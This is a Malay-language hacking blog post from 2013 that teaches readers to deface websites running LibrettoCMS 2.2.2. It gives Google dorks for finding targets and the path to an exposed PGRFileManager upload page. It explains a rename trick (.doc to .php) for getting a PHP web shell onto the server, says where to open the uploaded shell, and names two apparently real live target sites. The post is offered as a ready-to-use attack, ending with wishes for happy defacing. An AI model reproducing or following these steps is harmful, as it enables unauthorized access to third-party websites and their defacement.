Sunday, 16 June 2013

LibrettoCMS 2.2.2 File Upload Deface



Assalamualaikum dan salam sejahtera.Hari ini aku nak ajar exploit deface.Exploit ni terdapat pada LibrettoCMS 2.2.2.
Korang boleh upload shell php atau file deface html korang.

1. Mula-mula cari website dengan google dork :


"Powered By Libretto CMS"

inurl:/PGRFileManager.php


2. Buka website mana2 yang korang dapat dan tambah url ni:

/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php


Contoh :

http://www.site.com/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php


3. Kemudian akan keluar macam ni :



4. Kemudian korang click dekat anak panah warna Hijau kat tepi Files tu.Pilih shell php korang.tapi rename shell tu jadi shell.doc .

Lepas tu upload! lepas dah upload korang cari nama shell korang tadi dalam file manager tu.Kemudian rename pulak jadi shell.php .


Shell korang akan hilang dalam file manager tu.tapi sebenarnya masih ada :D

5. Untuk tengok hasil :

http://www.site.com/userfiles/shell.php


Itu saja! siap....selamat ber-deface...

Live target :
http://9floor.pl/js/libraries/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
http://www.thegioibaochi.com/admin/ckeditor/plugins/pgrfilemanager/PGRFileManager.php


Item Reviewed: LibrettoCMS 2.2.2 File Upload Deface Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com